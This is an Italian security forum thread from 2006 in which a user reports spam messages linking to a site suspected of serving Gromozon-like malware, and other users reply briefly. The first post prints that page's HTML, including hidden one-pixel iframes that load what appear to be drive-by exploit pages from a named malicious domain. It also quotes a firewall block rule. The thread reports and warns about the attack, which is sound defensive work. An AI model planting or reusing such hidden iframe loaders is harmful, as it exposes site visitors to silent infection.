Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > AV e sicurezza in generale

Alpine A290 alla prova: un'auto bella che ti fa innamorare, con qualche limite
Alpine A290 alla prova: un'auto bella che ti fa innamorare, con qualche limite
Abbiamo guidato per diversi giorni la Alpine A290, la prima elettrica del nuovo corso della marca. Non è solo una Renault 5 sotto steroidi, ha una sua identità e vuole farsi guidare
Recensione HONOR Magic 8 Lite: lo smartphone indistruttibile e instancabile
Recensione HONOR Magic 8 Lite: lo smartphone indistruttibile e instancabile
Abbiamo provato a fondo il nuovo Magic 8 Lite di HONOR, e per farlo siamo volati fino a Marrakech , dove abbiamo testato la resistenza di questo smartphone in ogni condizione possibile ed immaginabile. Il risultato? Uno smartphone praticamente indistruttibile e con un'autonomia davvero ottima. Ma c'è molto altro da sapere su Magic 8 Lite, ve lo raccontiamo in questa recensione completa.
Sony WF-1000X M6: le cuffie in-ear di riferimento migliorano ancora
Sony WF-1000X M6: le cuffie in-ear di riferimento migliorano ancora
WF-1000X M6 è la sesta generazione di auricolare in-ear sviluppata da Sony, un prodotto che punta a coniugare facilità di utilizzo con una elevata qualità di riproduzione dei contenuti audio e una cura nella riduzione del rumore ambientale che sia da riferimento
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 12-10-2006, 21:19   #1
*Nexus*
Senior Member
 
Iscritto dal: May 2005
Città: Milano
Messaggi: 365
people1000

Da un paio di giorni mi arrivano strani pm con il link al sito people1000 (http://[QUESTO NO]people1000.com/?Usu) il sito dopo aver fatto qualche prova dovrebbe contenere lo stesso malware di gromozon visto che solo disabilitando momentaneamente la rule al firewall che avevo creato (block all inbound and outbound tcp connection where remote address 82.255.114.158) il kaspersky rivela il malware sulla pagina, invece con la rule attiva tutto tace.

Il browser usato è firefox 2.0 beta 2, l'html della pagina è:

Codice:
<html>
<title>under construction</title>
<body>
<iframe src="http://idkqzshcjxr.com/page.php?10512" frameborder=0 width=1 height=1 scrolling=no></iframe>
<center><font size=12><b>under construction </b></font></center>
<table height=100%>
<tr height=100% valign=bottom><td>
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t44.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';'+Math.random()+
'" alt="" title="LiveInternet" '+
'border=0 width=31 height=31><\/a>')//--></script><!--/LiveInternet-->
</td></tr>
</table>
</body>
</html>
L'html della pagina dove risiede fisicamente il malware è:

Codice:
<iframe src="http://idkqzshcjxr.com/6edc9896/10512/9/wmp_nt.htm" width=1 height=1></iframe><iframe src="http://idkqzshcjxr.com/6edc9896/10512/1/firefox.php" width=9 height=9 style=display:none></iframe>
Spero di esser stato utile, volevo saperne qualcosa di più su questa infezione e su come i bot automatici siano riusciti ad infilarsi anche in forum molto famosi. (basta fare una ricerchina il google per trovare molti forum vittima di questo spamming virale: http://www.google.it/search?hl=it&q=...nG=Cerca&meta= )

Grazie
*Nexus* è offline   Rispondi citando il messaggio o parte di esso
Old 12-10-2006, 21:44   #2
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 29028
...non su questo sito vero?
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 12-10-2006, 21:47   #3
*Nexus*
Senior Member
 
Iscritto dal: May 2005
Città: Milano
Messaggi: 365
No

phpbb.it per esempio.
*Nexus* è offline   Rispondi citando il messaggio o parte di esso
Old 12-10-2006, 21:51   #4
juninho85
Bannato
 
L'Avatar di juninho85
 
Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
Messaggi: 29028
Quote:
Originariamente inviato da *Nexus*
No

phpbb.it per esempio.
immaginavo..comunque è capitato pure a me,me la son puzzata subito e non ho cliccato sul link

magari edita gli indirizzi,si sa mai...
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 12-10-2006, 21:52   #5
IpseDixit
Senior Member
 
L'Avatar di IpseDixit
 
Iscritto dal: Apr 2004
Messaggi: 350
E' un bug dei forum phpbb
IpseDixit è offline   Rispondi citando il messaggio o parte di esso
Old 17-10-2006, 17:16   #6
meghas
Junior Member
 
Iscritto dal: Oct 2006
Messaggi: 14
ewido lo cancella tranquillamente ???
meghas è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Alpine A290 alla prova: un'auto bella che ti fa innamorare, con qualche limite Alpine A290 alla prova: un'auto bella che ti fa ...
Recensione HONOR Magic 8 Lite: lo smartphone indistruttibile e instancabile Recensione HONOR Magic 8 Lite: lo smartphone ind...
Sony WF-1000X M6: le cuffie in-ear di riferimento migliorano ancora Sony WF-1000X M6: le cuffie in-ear di riferiment...
Snowflake porta l'IA dove sono i dati, anche grazie a un accordo con OpenAI Snowflake porta l'IA dove sono i dati, anche gra...
Sistema Mesh Roamii BE Pro: il Wi-Fi 7 secondo MSI Sistema Mesh Roamii BE Pro: il Wi-Fi 7 secondo M...
Caos F1 2026: 14 monoposto senza omologa...
Tesla festeggia il primo Cybercab prodot...
Desktop piccolo e potente? NZXT H2 Flow ...
Logan Paul vende la sua carta Pokemon &q...
Polestar spinge sull'acceleratore: arriv...
Nuovo record mondiale nel fotovoltaico: ...
L'ultimo baluardo cade: fine supporto pe...
'Il mondo non ha mai visto nulla di simi...
La Commissione europea mette sotto indag...
Arriva il primo computer quantistico ad ...
'Se lavori al PC sei a rischio': la prev...
Windows 11 introduce il supporto nativo ...
Apple AirDrop su Android: dopo Pixel 10,...
Upgrade PC senza spendere una fortuna: G...
Sistema di sblocco alla iPhone anche su ...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 16:07.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v